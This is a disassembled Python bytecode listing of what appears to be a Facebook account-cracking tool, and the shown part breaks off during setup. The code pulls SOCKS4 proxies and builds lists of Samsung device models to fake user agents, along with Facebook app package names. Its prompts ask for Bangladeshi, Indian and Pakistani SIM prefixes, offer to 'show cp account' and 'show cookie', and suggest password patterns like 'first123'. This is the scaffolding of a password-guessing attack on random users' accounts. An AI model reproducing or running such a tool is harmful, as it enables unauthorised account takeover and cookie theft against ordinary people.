0            RESUME                   0

   4            LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              0 (os)
                STORE_NAME               0 (os)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              1 (time)
                STORE_NAME               1 (time)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              2 (random)
                STORE_NAME               2 (random)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              3 (string)
                STORE_NAME               3 (string)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              4 (re)
                STORE_NAME               4 (re)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              5 (sys)
                STORE_NAME               5 (sys)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              6 (requests)
                STORE_NAME               6 (requests)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              7 (json)
                STORE_NAME               7 (json)
                LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              8 (uuid)
                STORE_NAME               8 (uuid)

   5            LOAD_CONST               0 (0)
                LOAD_CONST               2 (('ThreadPoolExecutor',))
                IMPORT_NAME              9 (concurrent.futures)
                IMPORT_FROM             10 (ThreadPoolExecutor)
                STORE_NAME              11 (ThreadPool)
                POP_TOP

   6            LOAD_CONST               3 (('GT-1015', 'GT-1020', 'GT-1030', 'GT-1035', 'GT-1040', 'GT-1045', 'GT-1050', 'GT-1240', 'GT-1440', 'GT-1450', 'GT-18190', 'GT-18262', 'GT-19060I', 'GT-19082', 'GT-19083', 'GT-19105', 'GT-19152', 'GT-19192', 'GT-19300', 'GT-19505', 'GT-2000', 'GT-20000', 'GT-200s', 'GT-3000', 'GT-414XOP', 'GT-6918', 'GT-7010', 'GT-7020', 'GT-7030', 'GT-7040', 'GT-7050', 'GT-7100', 'GT-7105', 'GT-7110', 'GT-7205', 'GT-7210', 'GT-7240R', 'GT-7245', 'GT-7303', 'GT-7310', 'GT-7320', 'GT-7325', 'GT-7326', 'GT-7340', 'GT-7405', 'GT-7550 5GT-8005', 'GT-8010', 'GT-81', 'GT-810', 'GT-8105', 'GT-8110', 'GT-8220S', 'GT-8410', 'GT-9300', 'GT-9320', 'GT-93G', 'GT-A7100', 'GT-A9500', 'GT-ANDROID', 'GT-B2710', 'GT-B5330', 'GT-B5330B', 'GT-B5330L', 'GT-B5330ZKAINU', 'GT-B5510', 'GT-B5512', 'GT-B5722', 'GT-B7510', 'GT-B7722', 'GT-B7810', 'GT-B9150', 'GT-B9388', 'GT-C3010', 'GT-C3262', 'GT-C3310R', 'GT-C3312', 'GT-C3312R', 'GT-C3313T', 'GT-C3322', 'GT-C3322i', 'GT-C3520', 'GT-C3520I', 'GT-C3592', 'GT-C3595', 'GT-C3782', 'GT-C6712', 'GT-E1282T', 'GT-E1500', 'GT-E2200', 'GT-E2202', 'GT-E2250', 'GT-E2252', 'GT-E2600', 'GT-E2652W', 'GT-E3210', 'GT-E3309', 'GT-E3309I', 'GT-E3309T', 'GT-G530H', 'GT-G930F', 'GT-H9500', 'GT-I5508', 'GT-I5801', 'GT-I6410', 'GT-I8150', 'GT-I8160OKLTPA', 'GT-I8160ZWLTTT', 'GT-I8258', 'GT-I8262D', 'GT-I8268GT-I8505', 'GT-I8530BAABTU', 'GT-I8530BALCHO', 'GT-I8530BALTTT', 'GT-I8550E', 'GT-I8750', 'GT-I900', 'GT-I9008L', 'GT-I9080E', 'GT-I9082C', 'GT-I9082EWAINU', 'GT-I9082i', 'GT-I9100G', 'GT-I9100LKLCHT', 'GT-I9100M', 'GT-I9100P', 'GT-I9100T', 'GT-I9105UANDBT', 'GT-I9128E', 'GT-I9128I', 'GT-I9128V', 'GT-I9158P', 'GT-I9158V', 'GT-I9168I', 'GT-I9190', 'GT-I9192', 'GT-I9192I', 'GT-I9195H', 'GT-I9195L', 'GT-I9250', 'GT-I9300', 'GT-I9300I', 'GT-I9301I', 'GT-I9303I', 'GT-I9305N', 'GT-I9308I', 'GT-I9500', 'GT-I9505G', 'GT-I9505X', 'GT-I9507V', 'GT-I9600', 'GT-M5650', 'GT-N5000S', 'GT-N5100', 'GT-N5105', 'GT-N5110', 'GT-N5120', 'GT-N7000B', 'GT-N7005', 'GT-N7100', 'GT-N7100T', 'GT-N7102', 'GT-N7105', 'GT-N7105T', 'GT-N7108', 'GT-N7108D', 'GT-N8000', 'GT-N8005', 'GT-N8010', 'GT-N8020', 'GT-N9000', 'GT-N9505', 'GT-P1000CWAXSA', 'GT-P1000M', 'GT-P1000T', 'GT-P1010', 'GT-P3100B', 'GT-P3105', 'GT-P3108', 'GT-P3110', 'GT-P5100', 'GT-P5110', 'GT-P5200', 'GT-P5210', 'GT-P5210XD1', 'GT-P5220', 'GT-P6200', 'GT-P6200L', 'GT-P6201', 'GT-P6210', 'GT-P6211', 'GT-P6800', 'GT-P7100', 'GT-P7300', 'GT-P7300B', 'GT-P7310', 'GT-P7320', 'GT-P7500D', 'GT-P7500M', 'SAMSUNG', 'LMY4', 'LMY47V', 'MMB29K', 'MMB29M', 'LRX22C', 'LRX22G', 'NMF2', 'NMF26X', 'NMF26X;', 'NRD90M', 'NRD90M;', 'SPH-L720', 'IML74K', 'IMM76D', 'JDQ39', 'JSS15J', 'JZO54K', 'KOT4', 'KOT49H', 'KOT4SM-T310', 'KTU84P', 'SM-A500F', 'SM-A500FU', 'SM-A500H', 'SM-G532F', 'SM-G900F', 'SM-G920F', 'SM-G930F', 'SM-G935', 'SM-G950F', 'SM-J320F', 'SM-J320FN', 'SM-J320H', 'SM-J320M', 'SM-J510FN', 'SM-J701F', 'SM-N920S', 'SM-T111', 'SM-T230', 'SM-T231', 'SM-T235', 'SM-T280', 'SM-T311', 'SM-T315', 'SM-T525', 'SM-T531', 'SM-T535', 'SM-T555', 'SM-T561', 'SM-T705', 'SM-T805', 'SM-T820'))
                STORE_NAME              12 (gtxx)

   7            LOAD_CONST               3 (('GT-1015', 'GT-1020', 'GT-1030', 'GT-1035', 'GT-1040', 'GT-1045', 'GT-1050', 'GT-1240', 'GT-1440', 'GT-1450', 'GT-18190', 'GT-18262', 'GT-19060I', 'GT-19082', 'GT-19083', 'GT-19105', 'GT-19152', 'GT-19192', 'GT-19300', 'GT-19505', 'GT-2000', 'GT-20000', 'GT-200s', 'GT-3000', 'GT-414XOP', 'GT-6918', 'GT-7010', 'GT-7020', 'GT-7030', 'GT-7040', 'GT-7050', 'GT-7100', 'GT-7105', 'GT-7110', 'GT-7205', 'GT-7210', 'GT-7240R', 'GT-7245', 'GT-7303', 'GT-7310', 'GT-7320', 'GT-7325', 'GT-7326', 'GT-7340', 'GT-7405', 'GT-7550 5GT-8005', 'GT-8010', 'GT-81', 'GT-810', 'GT-8105', 'GT-8110', 'GT-8220S', 'GT-8410', 'GT-9300', 'GT-9320', 'GT-93G', 'GT-A7100', 'GT-A9500', 'GT-ANDROID', 'GT-B2710', 'GT-B5330', 'GT-B5330B', 'GT-B5330L', 'GT-B5330ZKAINU', 'GT-B5510', 'GT-B5512', 'GT-B5722', 'GT-B7510', 'GT-B7722', 'GT-B7810', 'GT-B9150', 'GT-B9388', 'GT-C3010', 'GT-C3262', 'GT-C3310R', 'GT-C3312', 'GT-C3312R', 'GT-C3313T', 'GT-C3322', 'GT-C3322i', 'GT-C3520', 'GT-C3520I', 'GT-C3592', 'GT-C3595', 'GT-C3782', 'GT-C6712', 'GT-E1282T', 'GT-E1500', 'GT-E2200', 'GT-E2202', 'GT-E2250', 'GT-E2252', 'GT-E2600', 'GT-E2652W', 'GT-E3210', 'GT-E3309', 'GT-E3309I', 'GT-E3309T', 'GT-G530H', 'GT-G930F', 'GT-H9500', 'GT-I5508', 'GT-I5801', 'GT-I6410', 'GT-I8150', 'GT-I8160OKLTPA', 'GT-I8160ZWLTTT', 'GT-I8258', 'GT-I8262D', 'GT-I8268GT-I8505', 'GT-I8530BAABTU', 'GT-I8530BALCHO', 'GT-I8530BALTTT', 'GT-I8550E', 'GT-I8750', 'GT-I900', 'GT-I9008L', 'GT-I9080E', 'GT-I9082C', 'GT-I9082EWAINU', 'GT-I9082i', 'GT-I9100G', 'GT-I9100LKLCHT', 'GT-I9100M', 'GT-I9100P', 'GT-I9100T', 'GT-I9105UANDBT', 'GT-I9128E', 'GT-I9128I', 'GT-I9128V', 'GT-I9158P', 'GT-I9158V', 'GT-I9168I', 'GT-I9190', 'GT-I9192', 'GT-I9192I', 'GT-I9195H', 'GT-I9195L', 'GT-I9250', 'GT-I9300', 'GT-I9300I', 'GT-I9301I', 'GT-I9303I', 'GT-I9305N', 'GT-I9308I', 'GT-I9500', 'GT-I9505G', 'GT-I9505X', 'GT-I9507V', 'GT-I9600', 'GT-M5650', 'GT-N5000S', 'GT-N5100', 'GT-N5105', 'GT-N5110', 'GT-N5120', 'GT-N7000B', 'GT-N7005', 'GT-N7100', 'GT-N7100T', 'GT-N7102', 'GT-N7105', 'GT-N7105T', 'GT-N7108', 'GT-N7108D', 'GT-N8000', 'GT-N8005', 'GT-N8010', 'GT-N8020', 'GT-N9000', 'GT-N9505', 'GT-P1000CWAXSA', 'GT-P1000M', 'GT-P1000T', 'GT-P1010', 'GT-P3100B', 'GT-P3105', 'GT-P3108', 'GT-P3110', 'GT-P5100', 'GT-P5110', 'GT-P5200', 'GT-P5210', 'GT-P5210XD1', 'GT-P5220', 'GT-P6200', 'GT-P6200L', 'GT-P6201', 'GT-P6210', 'GT-P6211', 'GT-P6800', 'GT-P7100', 'GT-P7300', 'GT-P7300B', 'GT-P7310', 'GT-P7320', 'GT-P7500D', 'GT-P7500M', 'SAMSUNG', 'LMY4', 'LMY47V', 'MMB29K', 'MMB29M', 'LRX22C', 'LRX22G', 'NMF2', 'NMF26X', 'NMF26X;', 'NRD90M', 'NRD90M;', 'SPH-L720', 'IML74K', 'IMM76D', 'JDQ39', 'JSS15J', 'JZO54K', 'KOT4', 'KOT49H', 'KOT4SM-T310', 'KTU84P', 'SM-A500F', 'SM-A500FU', 'SM-A500H', 'SM-G532F', 'SM-G900F', 'SM-G920F', 'SM-G930F', 'SM-G935', 'SM-G950F', 'SM-J320F', 'SM-J320FN', 'SM-J320H', 'SM-J320M', 'SM-J510FN', 'SM-J701F', 'SM-N920S', 'SM-T111', 'SM-T230', 'SM-T231', 'SM-T235', 'SM-T280', 'SM-T311', 'SM-T315', 'SM-T525', 'SM-T531', 'SM-T535', 'SM-T555', 'SM-T561', 'SM-T705', 'SM-T805', 'SM-T820'))
                STORE_NAME              13 (gt)

   8    L1:     LOAD_NAME                0 (os)
                LOAD_ATTR               28 (system)
                PUSH_NULL
                LOAD_CONST               4 ('pkg install espeak')
                CALL                     1
                POP_TOP

  10    L2:     LOAD_NAME                0 (os)
                LOAD_ATTR               28 (system)
                PUSH_NULL
                LOAD_CONST               5 ('git pull')
                CALL                     1
                POP_TOP

  11            NOP

  12    L3:     LOAD_NAME                6 (requests)
                LOAD_ATTR               30 (get)
                PUSH_NULL
                LOAD_CONST               6 ('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all')
                CALL                     1
                LOAD_ATTR               32 (text)
                STORE_NAME              17 (proxylist)

  13            LOAD_NAME               18 (open)
                PUSH_NULL
                LOAD_CONST               7 ('socksku.txt')
                LOAD_CONST               8 ('w')
                CALL                     2
                LOAD_ATTR               39 (write + NULL|self)
                LOAD_NAME               17 (proxylist)
                CALL                     1
                POP_TOP

  15    L4:     LOAD_NAME               18 (open)
                PUSH_NULL
                LOAD_CONST               7 ('socksku.txt')
                LOAD_CONST               9 ('r')
                CALL                     2
                LOAD_ATTR               45 (read + NULL|self)
                CALL                     0
                LOAD_ATTR               47 (splitlines + NULL|self)
                CALL                     0
                STORE_NAME              24 (proxsi)

  17            LOAD_CONST              10 ('\x1b[1;90m')
                STORE_NAME              25 (B)

  18            LOAD_CONST              11 ('\x1b[1;91m')
                STORE_NAME              26 (R)

  19            LOAD_CONST              12 ('\x1b[1;92m')
                STORE_NAME              27 (G)

  20            LOAD_CONST              13 ('\x1b[1;93m')
                STORE_NAME              28 (H)

  21            LOAD_CONST              14 ('\x1b[1;94m')
                STORE_NAME              29 (BL)

  22            LOAD_CONST              15 ('\x1b[1;95m')
                STORE_NAME              30 (BG)

  23            LOAD_CONST              16 ('\x1b[1;96m')
                STORE_NAME              31 (S)

  24            LOAD_CONST              17 ('\x1b[1;97m')
                STORE_NAME              32 (W)

  25            LOAD_CONST              18 ('\x1b[0m')
                STORE_NAME              33 (EX)

  26            LOAD_CONST              19 ('\x1b[m')
                STORE_NAME              34 (E)

  28            BUILD_LIST               0
                STORE_NAME              35 (ugen)

  29            BUILD_LIST               0
                STORE_NAME              36 (ugtn)

  30            BUILD_LIST               0
                STORE_NAME              37 (ugxn)

  31            LOAD_CONST               3 (('GT-1015', 'GT-1020', 'GT-1030', 'GT-1035', 'GT-1040', 'GT-1045', 'GT-1050', 'GT-1240', 'GT-1440', 'GT-1450', 'GT-18190', 'GT-18262', 'GT-19060I', 'GT-19082', 'GT-19083', 'GT-19105', 'GT-19152', 'GT-19192', 'GT-19300', 'GT-19505', 'GT-2000', 'GT-20000', 'GT-200s', 'GT-3000', 'GT-414XOP', 'GT-6918', 'GT-7010', 'GT-7020', 'GT-7030', 'GT-7040', 'GT-7050', 'GT-7100', 'GT-7105', 'GT-7110', 'GT-7205', 'GT-7210', 'GT-7240R', 'GT-7245', 'GT-7303', 'GT-7310', 'GT-7320', 'GT-7325', 'GT-7326', 'GT-7340', 'GT-7405', 'GT-7550 5GT-8005', 'GT-8010', 'GT-81', 'GT-810', 'GT-8105', 'GT-8110', 'GT-8220S', 'GT-8410', 'GT-9300', 'GT-9320', 'GT-93G', 'GT-A7100', 'GT-A9500', 'GT-ANDROID', 'GT-B2710', 'GT-B5330', 'GT-B5330B', 'GT-B5330L', 'GT-B5330ZKAINU', 'GT-B5510', 'GT-B5512', 'GT-B5722', 'GT-B7510', 'GT-B7722', 'GT-B7810', 'GT-B9150', 'GT-B9388', 'GT-C3010', 'GT-C3262', 'GT-C3310R', 'GT-C3312', 'GT-C3312R', 'GT-C3313T', 'GT-C3322', 'GT-C3322i', 'GT-C3520', 'GT-C3520I', 'GT-C3592', 'GT-C3595', 'GT-C3782', 'GT-C6712', 'GT-E1282T', 'GT-E1500', 'GT-E2200', 'GT-E2202', 'GT-E2250', 'GT-E2252', 'GT-E2600', 'GT-E2652W', 'GT-E3210', 'GT-E3309', 'GT-E3309I', 'GT-E3309T', 'GT-G530H', 'GT-G930F', 'GT-H9500', 'GT-I5508', 'GT-I5801', 'GT-I6410', 'GT-I8150', 'GT-I8160OKLTPA', 'GT-I8160ZWLTTT', 'GT-I8258', 'GT-I8262D', 'GT-I8268GT-I8505', 'GT-I8530BAABTU', 'GT-I8530BALCHO', 'GT-I8530BALTTT', 'GT-I8550E', 'GT-I8750', 'GT-I900', 'GT-I9008L', 'GT-I9080E', 'GT-I9082C', 'GT-I9082EWAINU', 'GT-I9082i', 'GT-I9100G', 'GT-I9100LKLCHT', 'GT-I9100M', 'GT-I9100P', 'GT-I9100T', 'GT-I9105UANDBT', 'GT-I9128E', 'GT-I9128I', 'GT-I9128V', 'GT-I9158P', 'GT-I9158V', 'GT-I9168I', 'GT-I9190', 'GT-I9192', 'GT-I9192I', 'GT-I9195H', 'GT-I9195L', 'GT-I9250', 'GT-I9300', 'GT-I9300I', 'GT-I9301I', 'GT-I9303I', 'GT-I9305N', 'GT-I9308I', 'GT-I9500', 'GT-I9505G', 'GT-I9505X', 'GT-I9507V', 'GT-I9600', 'GT-M5650', 'GT-N5000S', 'GT-N5100', 'GT-N5105', 'GT-N5110', 'GT-N5120', 'GT-N7000B', 'GT-N7005', 'GT-N7100', 'GT-N7100T', 'GT-N7102', 'GT-N7105', 'GT-N7105T', 'GT-N7108', 'GT-N7108D', 'GT-N8000', 'GT-N8005', 'GT-N8010', 'GT-N8020', 'GT-N9000', 'GT-N9505', 'GT-P1000CWAXSA', 'GT-P1000M', 'GT-P1000T', 'GT-P1010', 'GT-P3100B', 'GT-P3105', 'GT-P3108', 'GT-P3110', 'GT-P5100', 'GT-P5110', 'GT-P5200', 'GT-P5210', 'GT-P5210XD1', 'GT-P5220', 'GT-P6200', 'GT-P6200L', 'GT-P6201', 'GT-P6210', 'GT-P6211', 'GT-P6800', 'GT-P7100', 'GT-P7300', 'GT-P7300B', 'GT-P7310', 'GT-P7320', 'GT-P7500D', 'GT-P7500M', 'SAMSUNG', 'LMY4', 'LMY47V', 'MMB29K', 'MMB29M', 'LRX22C', 'LRX22G', 'NMF2', 'NMF26X', 'NMF26X;', 'NRD90M', 'NRD90M;', 'SPH-L720', 'IML74K', 'IMM76D', 'JDQ39', 'JSS15J', 'JZO54K', 'KOT4', 'KOT49H', 'KOT4SM-T310', 'KTU84P', 'SM-A500F', 'SM-A500FU', 'SM-A500H', 'SM-G532F', 'SM-G900F', 'SM-G920F', 'SM-G930F', 'SM-G935', 'SM-G950F', 'SM-J320F', 'SM-J320FN', 'SM-J320H', 'SM-J320M', 'SM-J510FN', 'SM-J701F', 'SM-N920S', 'SM-T111', 'SM-T230', 'SM-T231', 'SM-T235', 'SM-T280', 'SM-T311', 'SM-T315', 'SM-T525', 'SM-T531', 'SM-T535', 'SM-T555', 'SM-T561', 'SM-T705', 'SM-T805', 'SM-T820'))
                STORE_NAME              38 (xxxxx)

  32            LOAD_CONST              20 (('com.facebook.adsmanager', 'com.facebook.lite', 'com.facebook.orca', 'com.facebook.katana', 'com.facebook.mlite'))
                STORE_NAME              39 (fbks)

  35            LOAD_CONST              21 ('')
                STORE_NAME              40 (dt)

  37            LOAD_NAME               41 (id)
                POP_TOP

  38            BUILD_LIST               0
                STORE_GLOBAL            42 (ok)

  39            BUILD_LIST               0
                STORE_GLOBAL            43 (cp)

  40            BUILD_LIST               0
                STORE_NAME              44 (twf)

  41            LOAD_CONST               0 (0)
                STORE_GLOBAL            45 (lop)

  42            BUILD_LIST               0
                STORE_NAME              46 (xode)

  43            BUILD_LIST               0
                STORE_NAME              47 (plist)

  44            BUILD_LIST               0
                STORE_NAME              48 (cpx)

  45            BUILD_LIST               0
                STORE_NAME              49 (cokix)

  46            BUILD_LIST               0
                STORE_NAME              50 (apkx)

  47            BUILD_LIST               0
                STORE_NAME              51 (paswtrh)

  48            BUILD_LIST               0
                STORE_NAME              52 (rcd)

  49            BUILD_LIST               0
                STORE_NAME              53 (rcdx)

  50            LOAD_CONST              22 ('1.07')
                STORE_NAME              54 (version)

  51            LOAD_CONST              23 (<code object line at 0x6e35d92c30, file "<x>", line 51>)
                MAKE_FUNCTION
                STORE_NAME              55 (line)

  54            LOAD_CONST              24 (' ')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_CONST              27 ('] BD SIM CODE : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              28 ('017 015 018 019 013 016')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING            11
                STORE_NAME              56 (BDX)

  55            LOAD_CONST              24 (' ')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_CONST              29 ('] IND SIM CODE : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              30 ('9670 9725 8948 8795 6383')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING            11
                STORE_NAME              57 (INDX)

  56            LOAD_CONST              24 (' ')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_CONST              31 ('] PAK SIM CODE : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              32 ('0306 0315 0335 0345 0318')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING            11
                STORE_NAME              58 (PAKX)

  57            LOAD_CONST              33 (' [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_CONST              34 ('] EXAMPLE : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              35 ('10000')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              37 ('20000')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              38 ('30000')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              39 ('40000')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              40 ('99999')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING            24
                STORE_NAME              59 (LIMITX)

  59            LOAD_CONST              33 (' [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              41 ('] Do you went show cp account (y/n)')
                BUILD_STRING             5
                STORE_NAME              60 (CPG)

  60            LOAD_CONST              33 (' [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              42 ('] Do you went show cookie (y/n)')
                BUILD_STRING             5
                STORE_NAME              61 (CKIG)

  61            LOAD_CONST              24 (' ')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              26 ('+')
                LOAD_NAME               34 (E)
                FORMAT_SIMPLE
                LOAD_CONST              43 ('] Choice : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                BUILD_STRING             8
                STORE_NAME              62 (chc)

  62            LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              44 ('•')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              45 ('] PUT FILE PATH\x1b[1;37m : ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              63 (flp)

  63            LOAD_CONST              46 ('EXAMPLE: ')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              47 ('first123')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              48 ('last123')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              49 ('firstlast')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              36 (',')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              50 ('name')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING            16
                STORE_NAME              64 (chcps)

  64            LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              51 ('A')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              52 ('] METHOD [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              53 ('1')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              54 (']\n')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              55 ('B')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              52 ('] METHOD [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              56 ('2')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              54 (']\n')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              57 ('C')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              52 ('] METHOD [')
                LOAD_NAME               27 (G)
                FORMAT_SIMPLE
                LOAD_CONST              58 ('3')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                BUILD_STRING            30
                STORE_NAME              65 (mxxt)

  65            LOAD_CONST              25 ('[')
                LOAD_NAME               26 (R)
                FORMAT_SIMPLE
                LOAD_CONST              60 ('!')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              61 ('] FILE LOCATION NOT FOUND ')
                BUILD_STRING             5
                STORE_NAME              66 (nflp)

  67            LOAD_CONST              62 ('\x1b[1;32m')
                STORE_NAME              27 (G)
                LOAD_CONST              63 ('\x1b[38;5;46m')
                STORE_NAME              67 (G1)
                LOAD_CONST              64 ('\x1b[38;5;47m')
                STORE_NAME              68 (G2)
                LOAD_CONST              65 ('\x1b[38;5;48m')
                STORE_NAME              69 (G3)
                LOAD_CONST              66 ('\x1b[38;5;49m')
                STORE_NAME              70 (G4)
                LOAD_CONST              67 ('\x1b[38;5;50m')
                STORE_NAME              71 (G5)
                LOAD_CONST              17 ('\x1b[1;97m')
                STORE_NAME              32 (W)
                LOAD_CONST              68 ('\x1b[38;5;160m')
                STORE_NAME              26 (R)
                LOAD_CONST              10 ('\x1b[1;90m')
                STORE_NAME              25 (B)
                LOAD_CONST              69 ('\x1b[1;33m')
                STORE_NAME              72 (Y)
                LOAD_CONST              70 ('\x1b[1;34m')
                STORE_NAME              73 (T)
                LOAD_CONST              71 ('\x1b[38;5;205m')
                STORE_NAME              34 (E)
                LOAD_CONST              72 ('\x1b[38;5;81m')
                STORE_NAME              74 (O)

  69            LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              44 ('•')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              75 (xd)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              53 ('1')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              76 (xd1)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              56 ('2')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              77 (xd2)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              58 ('3')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              78 (xd3)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              73 ('4')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              79 (xd4)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              44 ('•')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              80 (xd5)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              74 ('6')
